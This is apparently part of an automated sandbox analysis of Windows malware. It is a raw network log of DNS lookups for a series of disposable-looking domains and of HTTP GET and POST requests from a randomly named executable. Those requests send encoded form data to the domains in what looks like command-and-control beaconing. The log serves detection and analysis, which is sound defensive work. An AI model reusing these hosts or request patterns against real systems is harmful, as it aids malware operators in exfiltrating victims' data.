Nov 29, 2024 03:55:01.633342981 CET	50007	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:01.648066998 CET	50007	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:01.768094063 CET	80	50007	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:02.908226967 CET	80	50007	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:02.908247948 CET	80	50007	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:02.908327103 CET	50007	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:03.149161100 CET	50007	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:04.167586088 CET	50008	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:04.287832975 CET	80	50008	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:04.288124084 CET	50008	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:04.301853895 CET	50008	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:04.421952963 CET	80	50008	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:05.605709076 CET	80	50008	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:05.605730057 CET	80	50008	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:05.605786085 CET	50008	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:05.805372000 CET	50008	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:06.824338913 CET	50009	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:06.944587946 CET	80	50009	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:06.944829941 CET	50009	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:06.959697962 CET	50009	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:07.079658031 CET	80	50009	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:07.079864979 CET	80	50009	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:08.216430902 CET	80	50009	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:08.216505051 CET	80	50009	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:08.216619015 CET	50009	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:08.461554050 CET	50009	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:09.480402946 CET	50010	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:09.600594044 CET	80	50010	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:09.600692034 CET	50010	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:09.610085011 CET	50010	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:09.730082989 CET	80	50010	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:10.922472000 CET	80	50010	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:10.922751904 CET	80	50010	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:10.922947884 CET	50010	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:10.925448895 CET	50010	80	192.168.2.5	209.74.77.109
Nov 29, 2024 03:55:11.045291901 CET	80	50010	209.74.77.109	192.168.2.5
Nov 29, 2024 03:55:16.268805027 CET	50011	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:16.390692949 CET	80	50011	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:16.390820026 CET	50011	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:16.474531889 CET	50011	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:16.594542027 CET	80	50011	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:17.863266945 CET	80	50011	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:17.863946915 CET	80	50011	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:17.864027023 CET	50011	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:17.977145910 CET	50011	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:18.996273994 CET	50012	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:19.116561890 CET	80	50012	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:19.116688013 CET	50012	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:19.152892113 CET	50012	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:19.272891045 CET	80	50012	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:20.526401043 CET	80	50012	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:20.526726961 CET	80	50012	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:20.526834011 CET	50012	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:20.664483070 CET	50012	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:21.684144020 CET	50013	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:21.804364920 CET	80	50013	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:21.804517031 CET	50013	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:21.910578966 CET	50013	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:22.030596972 CET	80	50013	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:22.030714035 CET	80	50013	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:23.159331083 CET	80	50013	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:23.159953117 CET	80	50013	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:23.160011053 CET	50013	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:23.429997921 CET	50013	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:24.448765993 CET	50014	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:24.568787098 CET	80	50014	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:24.568918943 CET	50014	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:24.579932928 CET	50014	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:24.700382948 CET	80	50014	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:25.991354942 CET	80	50014	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:25.992080927 CET	80	50014	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:25.992151022 CET	50014	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:25.994486094 CET	50014	80	192.168.2.5	172.67.169.6
Nov 29, 2024 03:55:26.114424944 CET	80	50014	172.67.169.6	192.168.2.5
Nov 29, 2024 03:55:31.630877018 CET	50015	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:31.750952005 CET	80	50015	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:31.751076937 CET	50015	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:31.763650894 CET	50015	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:31.883673906 CET	80	50015	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:33.056523085 CET	80	50015	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:33.056665897 CET	80	50015	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:33.056754112 CET	50015	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:33.273720026 CET	50015	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:34.291666985 CET	50016	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:34.412036896 CET	80	50016	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:34.412168026 CET	50016	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:34.426805973 CET	50016	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:34.546860933 CET	80	50016	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:35.717648029 CET	80	50016	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:35.717798948 CET	80	50016	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:35.717869043 CET	50016	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:35.929796934 CET	50016	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:37.260473967 CET	50017	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:37.380705118 CET	80	50017	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:37.380909920 CET	50017	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:37.395771980 CET	50017	80	192.168.2.5	194.245.148.189
Nov 29, 2024 03:55:37.516024113 CET	80	50017	194.245.148.189	192.168.2.5
Nov 29, 2024 03:55:37.516036987 CET	80	50017	194.245.148.189	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 03:52:54.740876913 CET	55634	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:52:55.163726091 CET	53	55634	1.1.1.1	192.168.2.5
Nov 29, 2024 03:53:12.366075039 CET	56138	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:53:13.355158091 CET	56138	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:53:14.337975979 CET	53	56138	1.1.1.1	192.168.2.5
Nov 29, 2024 03:53:14.338047028 CET	53	56138	1.1.1.1	192.168.2.5
Nov 29, 2024 03:53:28.359275103 CET	62635	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:53:29.043549061 CET	53	62635	1.1.1.1	192.168.2.5
Nov 29, 2024 03:53:43.422108889 CET	51005	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:53:44.432560921 CET	51005	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:53:44.953428984 CET	53	51005	1.1.1.1	192.168.2.5
Nov 29, 2024 03:53:44.953444004 CET	53	51005	1.1.1.1	192.168.2.5
Nov 29, 2024 03:53:59.669635057 CET	51491	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:54:00.297136068 CET	53	51491	1.1.1.1	192.168.2.5
Nov 29, 2024 03:54:14.794980049 CET	50792	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:54:15.791152954 CET	50792	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:54:16.095901012 CET	53	50792	1.1.1.1	192.168.2.5
Nov 29, 2024 03:54:16.095927000 CET	53	50792	1.1.1.1	192.168.2.5
Nov 29, 2024 03:54:30.857042074 CET	63727	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:54:31.278851032 CET	53	63727	1.1.1.1	192.168.2.5
Nov 29, 2024 03:54:45.747143984 CET	51422	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:54:46.280687094 CET	53	51422	1.1.1.1	192.168.2.5
Nov 29, 2024 03:55:00.949920893 CET	61787	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:55:01.507869959 CET	53	61787	1.1.1.1	192.168.2.5
Nov 29, 2024 03:55:15.933996916 CET	55257	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:55:16.266244888 CET	53	55257	1.1.1.1	192.168.2.5
Nov 29, 2024 03:55:31.011322975 CET	60985	53	192.168.2.5	1.1.1.1
Nov 29, 2024 03:55:31.628256083 CET	53	60985	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2024 03:52:54.740876913 CET	192.168.2.5	1.1.1.1	0x86d4	Standard query (0)	www.zkdamdjj.shop	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:12.366075039 CET	192.168.2.5	1.1.1.1	0xdc60	Standard query (0)	www.75178.club	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:13.355158091 CET	192.168.2.5	1.1.1.1	0xdc60	Standard query (0)	www.75178.club	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:28.359275103 CET	192.168.2.5	1.1.1.1	0x5da1	Standard query (0)	www.orbitoasis.online	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:43.422108889 CET	192.168.2.5	1.1.1.1	0x8370	Standard query (0)	www.thaor56.online	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:44.432560921 CET	192.168.2.5	1.1.1.1	0x8370	Standard query (0)	www.thaor56.online	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:59.669635057 CET	192.168.2.5	1.1.1.1	0x7fda	Standard query (0)	www.earbudsstore.shop	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:14.794980049 CET	192.168.2.5	1.1.1.1	0x4842	Standard query (0)	www.superiorfencing.net	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:15.791152954 CET	192.168.2.5	1.1.1.1	0x4842	Standard query (0)	www.superiorfencing.net	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:30.857042074 CET	192.168.2.5	1.1.1.1	0xafac	Standard query (0)	www.beylikduzu616161.xyz	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:45.747143984 CET	192.168.2.5	1.1.1.1	0x6434	Standard query (0)	www.zxyck.net	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:00.949920893 CET	192.168.2.5	1.1.1.1	0xc3ba	Standard query (0)	www.dailyfuns.info	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:15.933996916 CET	192.168.2.5	1.1.1.1	0x4a12	Standard query (0)	www.mydreamdeal.click	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:31.011322975 CET	192.168.2.5	1.1.1.1	0xdfb3	Standard query (0)	www.maitreyatoys.world	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2024 03:52:55.163726091 CET	1.1.1.1	192.168.2.5	0x86d4	No error (0)	www.zkdamdjj.shop		104.21.40.167	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:52:55.163726091 CET	1.1.1.1	192.168.2.5	0x86d4	No error (0)	www.zkdamdjj.shop		172.67.187.114	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:14.337975979 CET	1.1.1.1	192.168.2.5	0xdc60	No error (0)	www.75178.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:14.337975979 CET	1.1.1.1	192.168.2.5	0xdc60	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:14.337975979 CET	1.1.1.1	192.168.2.5	0xdc60	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		23.167.152.41	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:14.338047028 CET	1.1.1.1	192.168.2.5	0xdc60	No error (0)	www.75178.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:14.338047028 CET	1.1.1.1	192.168.2.5	0xdc60	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:14.338047028 CET	1.1.1.1	192.168.2.5	0xdc60	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		23.167.152.41	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:29.043549061 CET	1.1.1.1	192.168.2.5	0x5da1	No error (0)	www.orbitoasis.online	orbitoasis.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:29.043549061 CET	1.1.1.1	192.168.2.5	0x5da1	No error (0)	orbitoasis.online		66.29.132.194	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:44.953428984 CET	1.1.1.1	192.168.2.5	0x8370	No error (0)	www.thaor56.online	thaor56.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:44.953428984 CET	1.1.1.1	192.168.2.5	0x8370	No error (0)	thaor56.online		202.92.5.23	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:53:44.953444004 CET	1.1.1.1	192.168.2.5	0x8370	No error (0)	www.thaor56.online	thaor56.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:53:44.953444004 CET	1.1.1.1	192.168.2.5	0x8370	No error (0)	thaor56.online		202.92.5.23	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:00.297136068 CET	1.1.1.1	192.168.2.5	0x7fda	No error (0)	www.earbudsstore.shop		194.195.220.41	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:16.095901012 CET	1.1.1.1	192.168.2.5	0x4842	No error (0)	www.superiorfencing.net	superiorfencing.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:54:16.095901012 CET	1.1.1.1	192.168.2.5	0x4842	No error (0)	superiorfencing.net		103.230.159.86	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:16.095927000 CET	1.1.1.1	192.168.2.5	0x4842	No error (0)	www.superiorfencing.net	superiorfencing.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 03:54:16.095927000 CET	1.1.1.1	192.168.2.5	0x4842	No error (0)	superiorfencing.net		103.230.159.86	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:31.278851032 CET	1.1.1.1	192.168.2.5	0xafac	No error (0)	www.beylikduzu616161.xyz		104.21.31.242	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:31.278851032 CET	1.1.1.1	192.168.2.5	0xafac	No error (0)	www.beylikduzu616161.xyz		172.67.180.246	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:54:46.280687094 CET	1.1.1.1	192.168.2.5	0x6434	No error (0)	www.zxyck.net		118.107.250.103	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:01.507869959 CET	1.1.1.1	192.168.2.5	0xc3ba	No error (0)	www.dailyfuns.info		209.74.77.109	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:16.266244888 CET	1.1.1.1	192.168.2.5	0x4a12	No error (0)	www.mydreamdeal.click		172.67.169.6	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:16.266244888 CET	1.1.1.1	192.168.2.5	0x4a12	No error (0)	www.mydreamdeal.click		104.21.27.59	A (IP address)	IN (0x0001)	false
Nov 29, 2024 03:55:31.628256083 CET	1.1.1.1	192.168.2.5	0xdfb3	No error (0)	www.maitreyatoys.world		194.245.148.189	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.zkdamdjj.shop

www.75178.club

www.orbitoasis.online

www.thaor56.online

www.earbudsstore.shop

www.superiorfencing.net

www.beylikduzu616161.xyz

www.zxyck.net

www.dailyfuns.info

www.mydreamdeal.click

www.maitreyatoys.world

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49717	104.21.40.167	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:52:55.309681892 CET	509	OUT	GET /vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8y2McqSV4CyXoecV2gg9VjbRvcHdH27Oe7WVepG5jlbykA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.zkdamdjj.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:52:57.314475060 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 29 Nov 2024 02:52:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: https://zkdamdjj.shop/vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8y2McqSV4CyXoecV2gg9VjbRvcHdH27Oe7WVepG5jlbykA== x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.a6d5303f744e03a41043b4a748aa35ee,02a_ x-litespeed-cache: miss CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zC9dDDcAwsGQWFwtyUV5LXGpkClJIaT5ZLnE62YtL9gSKJ8eOHVJ7BD7p5M4d1lQETs%2Bm2HVPdPm5ZRxMPMElH%2B%2FagyH4YVeV5W0e%2BfvW48tAJRmLzKxZ4pnYVpAWsR0LpAYBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f4df3ad4042dd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2032&rtt_var=1016&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=184& Data Raw: Data Ascii:
Nov 29, 2024 03:52:57.314510107 CET	53	IN	Data Raw: 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: nsent_bytes=0&cid=0000000000000000&ts=0&x=0"0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49762	23.167.152.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:14.475583076 CET	757	OUT	POST /a4h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.75178.club Origin: http://www.75178.club Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.75178.club/a4h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 32 37 4e 53 4e 44 43 47 76 45 42 41 54 33 6d 56 72 6d 72 37 70 69 62 7a 53 2b 50 31 45 69 35 57 37 31 45 54 41 36 77 4c 6e 57 53 51 39 35 70 4a 57 54 4e 78 65 63 6c 30 46 34 2b 33 6e 2b 4b 34 41 4e 6a 64 50 38 6e 63 4c 48 42 61 56 53 6a 56 32 34 37 6f 72 36 67 6b 32 31 65 69 6c 65 56 50 4c 76 6a 45 4a 51 37 57 67 34 74 7a 37 52 42 48 74 76 34 53 49 34 4c 4a 4a 39 32 53 30 68 34 78 57 70 6e 30 65 4b 66 4d 34 64 6b 47 4d 4b 67 2f 75 6b 59 48 61 32 71 37 41 79 31 6e 4c 4e 36 30 36 52 67 55 42 57 46 4b 70 4e 73 6c 55 41 4d 77 75 4d 6f 76 62 54 70 7a 71 50 30 3d Data Ascii: QtKtUpvP=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHa2q7Ay1nLN606RgUBWFKpNslUAMwuMovbTpzqP0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49768	23.167.152.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:17.132715940 CET	777	OUT	POST /a4h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.75178.club Origin: http://www.75178.club Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.75178.club/a4h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 52 57 37 52 55 54 42 2f 4d 4c 6b 57 53 51 79 5a 70 49 59 7a 4e 4d 65 63 70 57 46 36 36 33 6e 2b 75 34 41 4d 54 64 50 4d 62 64 4b 58 42 59 42 69 6a 58 38 59 37 6f 72 36 67 6b 32 31 4b 45 6c 66 39 50 4c 66 54 45 49 30 76 56 2b 6f 74 79 73 68 42 48 36 2f 35 36 49 34 4c 33 4a 38 36 6f 30 6e 38 78 57 72 50 30 65 66 7a 54 79 64 6b 49 43 71 68 59 74 56 35 6a 51 31 43 5a 42 6b 73 52 62 74 4f 51 37 6e 52 2b 62 30 4e 69 36 74 41 64 45 54 45 48 2f 38 4a 47 42 77 35 44 30 59 69 79 47 57 2b 4d 4c 6d 57 39 7a 47 71 43 62 78 2f 6b 54 58 46 63 Data Ascii: QtKtUpvP=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEURW7RUTB/MLkWSQyZpIYzNMecpWF663n+u4AMTdPMbdKXBYBijX8Y7or6gk21KElf9PLfTEI0vV+otyshBH6/56I4L3J86o0n8xWrP0efzTydkICqhYtV5jQ1CZBksRbtOQ7nR+b0Ni6tAdETEH/8JGBw5D0YiyGW+MLmW9zGqCbx/kTXFc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49775	23.167.152.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:19.788088083 CET	1794	OUT	POST /a4h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.75178.club Origin: http://www.75178.club Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.75178.club/a4h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 70 57 37 47 38 54 42 59 59 4c 72 32 53 51 2f 35 70 4e 59 7a 4e 64 65 63 68 53 46 36 33 43 6e 38 47 34 53 61 48 64 59 50 44 64 41 58 42 59 65 79 6a 57 32 34 36 79 72 36 77 67 32 31 61 45 6c 66 39 50 4c 63 4c 45 4d 67 37 56 38 6f 74 7a 37 52 42 4c 74 76 34 58 49 2b 6a 34 4a 38 2b 34 31 57 41 78 57 4c 66 30 5a 74 72 54 30 4e 6c 75 50 4b 68 41 74 56 31 38 51 30 75 76 42 6b 77 37 62 75 65 51 32 57 38 65 45 30 52 70 73 74 4d 6e 50 52 55 35 6d 73 5a 69 4b 6e 56 53 30 6f 75 56 45 45 71 38 64 44 4f 77 7a 69 6a 36 4a 45 50 2b 54 48 6f 6f 64 4a 4f 39 50 39 6f 44 4c 55 74 72 70 49 6b 6b 44 79 67 2b 39 4b 4f 50 65 6d 38 55 54 4a 5a 62 78 53 4a 36 57 70 31 54 39 4a 58 5a 47 42 71 46 78 4f 77 48 51 63 4b 58 47 72 6a 68 51 31 68 79 4a 50 64 61 68 33 78 2b 59 64 49 73 6b 36 75 31 5a 6e 44 54 79 45 39 2f 4d 63 64 32 4d 71 4e 37 54 48 79 61 7a 4f 46 51 62 69 69 4b 72 [TRUNCATED] Data Ascii: 